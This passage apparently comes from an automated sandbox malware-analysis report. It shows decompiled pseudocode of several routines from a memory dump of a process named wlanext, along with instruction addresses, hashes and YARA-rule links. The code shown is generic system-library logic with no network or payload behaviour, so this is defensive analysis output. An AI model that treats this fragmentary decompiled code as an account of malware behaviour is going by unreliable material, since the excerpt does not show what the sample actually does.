				 *(_t38 - 4) = 0xfffffffe;
				return E0353D0D1(L03574320());
			}















                                  0x03574257
                                  0x03574257
                                  0x03574257
                                  0x03574259
                                  0x0357425e
                                  0x03574263
                                  0x03574265
                                  0x03574273
                                  0x03574278
                                  0x0357427c
                                  0x0357427f
                                  0x03574281
                                  0x03574287
                                  0x035742d7
                                  0x035742d7
                                  0x035742da
                                  0x0357428d
                                  0x0357428d
                                  0x0357428f
                                  0x03574292
                                  0x03574297
                                  0x0357429c
                                  0x035742a0
                                  0x035742a6
                                  0x035742a8
                                  0x035742ae
                                  0x035742b3
                                  0x00000000
                                  0x035742ba
                                  0x035742ba
                                  0x035742bf
                                  0x035742c5
                                  0x035742ca
                                  0x035742cf
                                  0x035742d0
                                  0x00000000
                                  0x035742d0
                                  0x035742b3
                                  0x00000000
                                  0x035742a6
                                  0x0357429c
                                  0x035742dc
                                  0x035742dc
                                  0x035742e3
                                  0x03574309
                                  0x035742e5
                                  0x035742e5
                                  0x035742e8
                                  0x035742ee
                                  0x035742f0
                                  0x00000000
                                  0x035742f2
                                  0x035742f2
                                  0x035742f4
                                  0x035742f7
                                  0x035742f9
                                  0x03574300
                                  0x03574300
                                  0x035742f0
                                  0x0357430e
                                  0x0357431f

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8881a13034f1ee43cd056157b6592a1c7c8048393db0e3d5ce10a1bb261b6c1e
                                  • Instruction ID: 885b89fde135c104ff6f053b13a74c5b0b5b3e94f65026e9777794e8729b49f3
                                  • Opcode Fuzzy Hash: 8881a13034f1ee43cd056157b6592a1c7c8048393db0e3d5ce10a1bb261b6c1e
                                  • Instruction Fuzzy Hash: 9B2109B4502712CFC72AEF66F000A54B7F1FB85315B5486AEC1198F274E73294A6DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03512397 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E03512397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x35d848c != 0) {
					L0350FAD0(0x35d8610);
					if( *0x35d848c == 0) {
						E0350FA00(0x35d8610, _t19, _t27, 0x35d8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03512581(0x35d8610, 0x34c50a0, _t26, _t27, _t28);
						E0350FA00(0x35d8610, 0x34c50a0, _t27, 0x35d8610);
					}
				} else {
					L1:
					_t11 =  *0x35d8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03524886(0x34c1088, 1, 0x35d8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03512581(0x35d8610, (_t11 << 4) + 0x34c5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                  0x035123b0
                                  0x035123b6
                                  0x03512409
                                  0x03512415
                                  0x03555ae9
                                  0x00000000
                                  0x0351241b
                                  0x0351241b
                                  0x0351241d
                                  0x03512427
                                  0x0351242e
                                  0x03512430
                                  0x03512430
                                  0x035123b8
                                  0x035123b8
                                  0x035123b8
                                  0x035123bf
                                  0x035123fc
                                  0x035123fc
                                  0x035123c1
                                  0x035123c3
                                  0x035123d0
                                  0x035123d8
                                  0x035123d8
                                  0x035123dc
                                  0x035123de
                                  0x035123e1
                                  0x035123e1
                                  0x035123ec

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32e8e32d7f9ce5d233e6ff32ae7efcf86c74b7ec10d34b193944339917802c31
                                  • Instruction ID: 572953e15617f51dd2758a0e3d190a39e9683b7f03358da112b196086f1f1610
                                  • Opcode Fuzzy Hash: 32e8e32d7f9ce5d233e6ff32ae7efcf86c74b7ec10d34b193944339917802c31
                                  • Instruction Fuzzy Hash: E811083560034567E730E62ABC80F19B6E8FB90620F18482BF902EF1B1D7B0E8558698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035646A7 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E035646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0352F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0351D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L035077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                  0x035646b7
                                  0x035646ba
                                  0x035646c5
                                  0x035646c8
                                  0x035646d0
                                  0x035646d4
                                  0x035646e6
                                  0x035646e9
                                  0x035646f4
                                  0x035646ff
                                  0x03564705
                                  0x03564706
                                  0x0356470c
                                  0x03564713
                                  0x0356471b
                                  0x03564723
                                  0x03564725
                                  0x035646d6
                                  0x035646d9
                                  0x035646db
                                  0x035646db
                                  0x03564732

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                  • Instruction ID: e2f6868d17948f17a86ec783b25b4e1f4cd0b08a63518f79f21aa02746804de2
                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                  • Instruction Fuzzy Hash: 9011C276504208BBC715DF5DA8808BEBBB9FF95300F1080AAF9448B361DA329D55D7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EC962 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 42%
                                  			E034EC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x35dd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E034FEEF0(0x35d70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0356F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E034FEB70(_t29, 0x35d70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0352B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0356F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x35d70c0; // 0x0
					while(_t38 != 0x35d70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x35db1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                  0x034ec96a
                                  0x034ec974
                                  0x034ec988
                                  0x034ec98a
                                  0x03557c9d
                                  0x03557c9f
                                  0x03557ca4
                                  0x03557cae
                                  0x03557cf0
                                  0x03557cf5
                                  0x03557cfa
                                  0x034ec992
                                  0x034ec996
                                  0x034ec997
                                  0x034ec998
                                  0x034ec9a3
                                  0x034ec9a3
                                  0x03557cb0
                                  0x03557cb7
                                  0x03557cbb
                                  0x00000000
                                  0x00000000
                                  0x03557cbd
                                  0x03557ce8
                                  0x03557cc5
                                  0x03557cc8
                                  0x03557cca
                                  0x03557cd0
                                  0x03557cd6
                                  0x03557cde
                                  0x03557ce4
                                  0x03557ce4
                                  0x03557cd0
                                  0x00000000
                                  0x03557ce8
                                  0x034ec990
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5315d2d915157621d8a6e85d02b6b3b9bbf98022a6e51f7cc4594f7352557bb8
                                  • Instruction ID: 1a4be0e50071a08b8105659d9cb1c29d81aff0efb6c386c6e27d349c4f8b70f6
                                  • Opcode Fuzzy Hash: 5315d2d915157621d8a6e85d02b6b3b9bbf98022a6e51f7cc4594f7352557bb8
                                  • Instruction Fuzzy Hash: 1E11CE317007469FC720EE29F895A2AB7F6BB88610B44052AFD528B6B0DB20FC55CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035237F5 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E035237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03502280(_t6, 0x35d8550);
				}
				_t29 = E0352387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E034FFFB0(0x35d8550, _t27, 0x35d8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                  0x035237fa
                                  0x035237fc
                                  0x03523805
                                  0x03523808
                                  0x03523808
                                  0x03523814
                                  0x03523818
                                  0x03523846
                                  0x03523848
                                  0x0352384b
                                  0x0352384b
                                  0x03523852
                                  0x00000000
                                  0x03523854
                                  0x03523856
                                  0x00000000
                                  0x00000000
                                  0x03523863
                                  0x00000000
                                  0x03523863
                                  0x0352381a
                                  0x0352381a
                                  0x0352381f
                                  0x0352386e
                                  0x0352386e
                                  0x03523871
                                  0x03523873
                                  0x03523873
                                  0x03523868
                                  0x00000000
                                  0x03523868
                                  0x03523821
                                  0x03523826
                                  0x00000000
                                  0x00000000
                                  0x03523828
                                  0x0352382a
                                  0x03523841
                                  0x00000000
                                  0x03523841

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97365c44c2d577266d31ed7e6a5a9e5e62fdb00184ac8559de146ccba0efa6d8
                                  • Instruction ID: 3d8eed3d08f88892dc6f1d360bdeb4a9365eaadfff0d3aecb974ee26a366117b
                                  • Opcode Fuzzy Hash: 97365c44c2d577266d31ed7e6a5a9e5e62fdb00184ac8559de146ccba0efa6d8
                                  • Instruction Fuzzy Hash: 0D01087A9036215BC337CB19B500E26BFAAFFC6A50B1940A9ED058F2B4D738C801CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351002D Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0351002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03507D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03507D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03507D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03507D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                  0x03510032
                                  0x03510037
                                  0x03510043
                                  0x03554b3a
                                  0x03510049
                                  0x03510049
                                  0x03510049
                                  0x0351004e
                                  0x03510053
                                  0x03554b48
                                  0x03554b5a
                                  0x03554b4a
                                  0x03554b53
                                  0x03554b53
                                  0x03554b5f
                                  0x00000000
                                  0x03554b61
                                  0x00000000
                                  0x03554b61
                                  0x03510059
                                  0x03510059
                                  0x03510060
                                  0x03554b6f
                                  0x03554b6f
                                  0x03510069
                                  0x03554b83
                                  0x00000000
                                  0x00000000
                                  0x03554b90
                                  0x03554b9b
                                  0x03554b9b
                                  0x03554ba4
                                  0x00000000
                                  0x00000000
                                  0x03554baa
                                  0x00000000
                                  0x0351006f
                                  0x0351006f
                                  0x00000000
                                  0x0351006f
                                  0x03510069

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                  • Instruction ID: 4de3b11c8ee712221a2dba89bbaa9caa0b605fb723bbc1997bfdd6f3a90fcbc4
                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                  • Instruction Fuzzy Hash: 6111E5B22016818FEB22D726E964B3577E9BB45764F0E00E1ED148B6F2E729E8C1C250
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F766D Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E034F766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0351F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0351F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03504620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                  0x034f7672
                                  0x034f767f
                                  0x034f7689
                                  0x034f76de
                                  0x034f76de
                                  0x034f768b
                                  0x034f7691
                                  0x034f7693
                                  0x034f7697
                                  0x00000000
                                  0x034f7699
                                  0x034f76a8
                                  0x00000000
                                  0x034f76aa
                                  0x034f76ad
                                  0x034f76b1
                                  0x00000000
                                  0x034f76b3
                                  0x034f76b3
                                  0x034f76b5
                                  0x034f76ba
                                  0x034f76bc
                                  0x034f76bc
                                  0x034f76c0
                                  0x00000000
                                  0x034f76c2
                                  0x034f76ce
                                  0x034f76ce
                                  0x034f76c0
                                  0x034f76b1
                                  0x034f76a8
                                  0x034f7697
                                  0x034f76d9

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                  • Instruction ID: 09f9030abe85cd5cb73b0cdaa45bd7dce521804a0d45e70117cd49bb0a12213c
                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                  • Instruction Fuzzy Hash: 8D018872700119AFE720DE5EDD41E5BBBADEB846B0B1C4525BA08CF260DA34DD1187A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E9080 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E034E9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x35d85ec;
				E03502280(_t48, 0x35d85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E034FFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x35d538c; // 0x771c6848
					if( *_t84 != 0x35d5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x35bf6e8);
						E0353D0E8(0x35d85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E035B88F5(_t80, _t85, 0x35d5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x35d86c0; // 0xb407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x35d86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03502280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E035B88F5(0x35d85ec, _t85, 0x35d5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0352AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x35db1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x35d84c0;
																			if(_t82 >=  *0x35d84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E035B9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E034E922A(_t99);
										_t64 = E03507D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E035B8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x35d86c0; // 0xb407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x35d86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x35d86bc;
													_t87 = 0x35d86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E034E9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x35d86c4;
												_t87 = 0x35d86c0;
												L27:
												E03519B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0353D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x35d5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x35d538c = _t51;
						goto L6;
					}
				}
			}




















                                  0x034e9082
                                  0x034e9083
                                  0x034e9084
                                  0x034e9085
                                  0x034e9087
                                  0x034e9096
                                  0x034e9098
                                  0x034e9098
                                  0x034e909e
                                  0x034e90a8
                                  0x034e90e7
                                  0x034e90e7
                                  0x034e90aa
                                  0x034e90b0
                                  0x034e90b7
                                  0x034e90bd
                                  0x034e90dd
                                  0x034e90e6
                                  0x034e90bf
                                  0x034e90bf
                                  0x034e90c7
                                  0x034e90cf
                                  0x034e90f1
                                  0x034e90f2
                                  0x034e90f4
                                  0x034e90f5
                                  0x034e90f6
                                  0x034e90f7
                                  0x034e90f8
                                  0x034e90f9
                                  0x034e90fa
                                  0x034e90fb
                                  0x034e90fc
                                  0x034e90fd
                                  0x034e90fe
                                  0x034e90ff
                                  0x034e9100
                                  0x034e9102
                                  0x034e9107
                                  0x034e910c
                                  0x034e9110
                                  0x034e9113
                                  0x034e9115
                                  0x034e9136
                                  0x034e913f
                                  0x034e9143
                                  0x035437e4
                                  0x035437e4
                                  0x034e9117
                                  0x034e9117
                                  0x034e911d
                                  0x00000000
                                  0x034e911f
                                  0x034e911f
                                  0x034e9125
                                  0x00000000
                                  0x034e9127
                                  0x034e912d
                                  0x034e9130
                                  0x034e9134
                                  0x034e9158
                                  0x034e915d
                                  0x034e9161
                                  0x034e9168
                                  0x03543715
                                  0x034e916e
                                  0x034e916e
                                  0x034e9175
                                  0x034e9177
                                  0x034e917e
                                  0x034e917f
                                  0x034e9182
                                  0x034e9182
                                  0x034e9187
                                  0x034e9187
                                  0x034e918a
                                  0x034e918d
                                  0x034e918f
                                  0x034e9192
                                  0x034e9195
                                  0x034e9198
                                  0x034e9198
                                  0x034e9198
                                  0x034e919a
                                  0x00000000
                                  0x00000000
                                  0x0354371f
                                  0x03543721
                                  0x03543727
                                  0x0354372f
                                  0x03543733
                                  0x03543735
                                  0x03543738
                                  0x0354373b
                                  0x0354373d
                                  0x03543740
                                  0x00000000
                                  0x03543746
                                  0x03543746
                                  0x03543749
                                  0x00000000
                                  0x0354374f
                                  0x0354374f
                                  0x03543751
                                  0x03543757
                                  0x03543759
                                  0x0354375c
                                  0x0354375c
                                  0x0354375e
                                  0x0354375e
                                  0x03543761
                                  0x03543764
                                  0x00000000
